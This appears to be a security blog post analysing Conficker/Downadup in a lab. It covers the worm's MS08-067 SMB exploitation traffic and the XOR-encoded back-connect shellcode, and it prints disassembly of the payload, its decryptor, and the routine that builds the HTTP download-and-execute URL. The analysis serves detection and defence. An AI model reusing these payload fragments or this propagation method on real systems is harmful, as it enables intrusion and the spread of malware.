Downadup/Conficker/Kido Infection-traffic analysis

While analyzing the variant of Downadup/Conficker/Kido , I setup my analysis lab to know how exactly it attacks on other machines in LAN. So , I infected test  machine “IP”  and then run the sniffer like wireshark. As you can see in following image on successful connection to port 445 (SMB)of  , it is trying to send “NetPathCanonicalize” request by SRVSVC service ( Ms08-067 Vulnerabilty) See packet 113.


I found, after infecting the machine, it creates local http server (random port) to distribute the malware  .To infect other machine, it’ll send the same URL to victims. But  you cann’t see that request in packets “Path Query”  in “Netpathcanonicalize request” as it is encrypted!!! How do  i came to know ..

Answer—>>There is decyption routine in this packet itself .. see below this is data of packet 113.


It decodes to:

shortloc_8899FA         8031C4                  xor     byte ptr [ecx], 0C4h
seg000:008899FD       41                             inc     ecx
seg000:008899FE       6681394D53        cmp     word ptr [ecx], 534Dh
seg000:00889A03                75F5                          jnz     short loc_8899FA

It means the payload is encrypted with”XOR 0xC4″ . This code decrypts the  data by XORing with 0xC4 until word 0x534D comes. So, here it is :


Here you can see clearly , this is back-connect shellcode . So its infection method is;

1. It’ll exploit the vulnerabilty.

2. Successful exploitation results execution of payload.

3. Payload tells other machine to connect “already infected”  machine in this form

http://%5BinfectedPC ip]:port/[random]” . Here in my case it is “”

Infected machine had already opened the random port 6216 to spread malware. the string “ewflztq” is randomly generated for a particular session. From that location it downloads the copy of malware and do execution.

The same thing I verified in the code of malware specimen . see below
seg000:0087966F 50                                   push    eax             ; _DWORD
seg000:00879670 68 B4 3F 87 00        push    offset aHttpD_D_D_DDS ; “http://%d.%d.%d.%d:%d/%s”
seg000:00879675 8D 45 80                      lea     eax, [ebp+var_80]
seg000:00879678 68 80 00 00 00        push    80h             ; _DWORD
seg000:0087967D 50                                 push    eax             ; _DWORD
seg000:0087967E FF 15 B8 12 87 00  call    ds:MSVCRT_snprintf
seg000:00879684 8D 45 80                     lea     eax, [ebp+var_80]
seg000:00879687 50                                 push    eax
seg000:00879688 C6 45 FF 00              mov     [ebp+var_1], 0
seg000:0087968C E8 2F D9 00 00      call    j_MSVCRT_strlen
seg000:00879691 83 C4 28                     add     esp, 28h
seg000:00879694 05 BE 00 00 00      add     eax, 0BEh
seg000:00879699 50                                 push    eax
seg000:0087969A 6A 40                         push    40h
seg000:0087969C FF 15 C4 10 87 00      call    ds:GlobalAlloc
seg000:008796A2 85 C0                               test    eax, eax
seg000:008796A4 8B 75 08                         mov     esi, [ebp+arg_0]
seg000:008796A7 89 06                               mov     [esi], eax
seg000:008796A9 0F 84 84 00 00 00    jz      loc_879733
seg000:008796AF 53                                      push    ebx
seg000:008796B0 57                                      push    edi
seg000:008796B1 BF B9 00 00 00            mov     edi, 0B9h
seg000:008796B6 57                                       push    edi
seg000:008796B7 68 F0 99 88 00             push    offset Exploit_PayLoad_BackConnect
seg000:008796BC 50                                       push    eax
seg000:008796BD E8 10 D9 00 00            call    j_MSVCRT_memcpy

Encryption Loop
seg000:008796F5                         Do_Crypt_Payload: ;
seg000:008796F5 8B 06                   mov     eax, [esi]
seg000:008796F7 03 C7                   add     eax, edi
seg000:008796F9 80 30 C4             xor     byte ptr [eax], 0C4h
seg000:008796FC 8D 45 80             lea     eax, [ebp+var_80]
seg000:008796FF 50                          push    eax
seg000:00879700 47                         inc     edi
seg000:00879701 E8 BA D8 00 00   call    j_MSVCRT_strlen
seg000:00879706 03 C3                       add     eax, ebx
seg000:00879708 3B F8                      cmp     edi, eax
seg000:0087970A 59                            pop     ecx
seg000:0087970B 72 E8           jb      short Do_Crypt_Payload
seg000:0087970D                         loc_87970D:
seg000:0087970D 8B 06                   mov     eax, [esi]
seg000:0087970F C6 04 07 4D      mov     byte ptr [edi+eax], 4Dh
seg000:00879713 8B 06                    mov     eax, [esi]
seg000:00879715 C6 44 38 01 53 mov     byte ptr [eax+edi+1], 53h
seg000:0087971A 8B 06                   mov     eax, [esi]
seg000:0087971C C6 44 38 02 00mov     byte ptr [eax+edi+2], 0

And the Payload is :

Exploit_PayLoad_BackConnect: ;
seg000:008899F0 E8 FF FF FF FF call    near ptr Exploit_PayLoad_BackConnect+4
seg000:008899F0                         ; —————————————————————————
seg000:008899F5 C2                          db 0C2h ; –
seg000:008899F6                         ; —————————————————————————
seg000:008899F6 5F                            pop     edi
seg000:008899F7 8D 4F 10               lea     ecx, [edi+10h]
seg000:008899FA                         loc_8899FA:
seg000:008899FA 80 31 C4              xor     byte ptr [ecx], 0C4h
seg000:008899FD 41                            inc     ecx
seg000:008899FE 66 81 39 4D 53   cmp     word ptr [ecx], 534Dh
seg000:00889A03 75 F5                     jnz     short loc_8899FA
seg000:00889A05 FC                           cld
seg000:00889A06 6A 02                    push    2
seg000:00889A08 59                           pop     ecx
seg000:00889A09 64 8B 41 2E         mov     eax, fs:[ecx+2Eh]
seg000:00889A0D 8B 40 0C              mov     eax, [eax+0Ch]
seg000:00889A10 8B 40 1C               mov     eax, [eax+1Ch]
seg000:00889A13 8B 00                     mov     eax, [eax]
seg000:00889A15 8B 58 08               mov     ebx, [eax+8]
seg000:00889A18 8D B7 A1 00 00 00   lea     esi, [edi+0A1h]


4 Responses to “Downadup/Conficker/Kido Infection-traffic analysis”

  1. Phil Barnhart Says:

    Thanks for the detailed analysis. Not only can this virus disrupt your PC, since it can disable your ability to connect to software update sites it leaves you vulnerable to even more malware. You need to disable AutoPlay as well as patch your PC.

  2. Great analysis. It’s good to see Conficker broken down like that. It certainly makes detection and cleanup much easier.

  3. Great, I did not know about that up to now. Thanx!

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: